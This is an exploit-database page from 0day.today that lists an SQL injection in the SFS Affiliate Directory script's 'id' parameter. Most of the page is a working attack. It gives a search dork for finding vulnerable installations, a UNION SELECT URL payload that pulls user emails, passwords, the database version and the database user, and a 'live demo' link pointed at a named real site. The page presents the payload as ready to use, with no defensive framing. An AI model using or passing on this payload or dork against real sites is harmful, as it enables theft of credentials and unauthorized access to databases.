[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SFS Affiliate Directory (id) SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3539
Category
web applications
Date add
18-08-2008
Platform
unsorted
========================================================
SFS Affiliate Directory (id) SQL Injection Vulnerability
========================================================



|___________________________________________________|
|
| Affiliate Directory ( id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|___________________________________________________
|                                                   |
|
| DorK   : "Copyright 2005 Affiliate Directory"
|___________________________________________________|

Exploit: 


www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--



L!VE DEMO: :


http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--





#  0day.today [2024-12-24]  #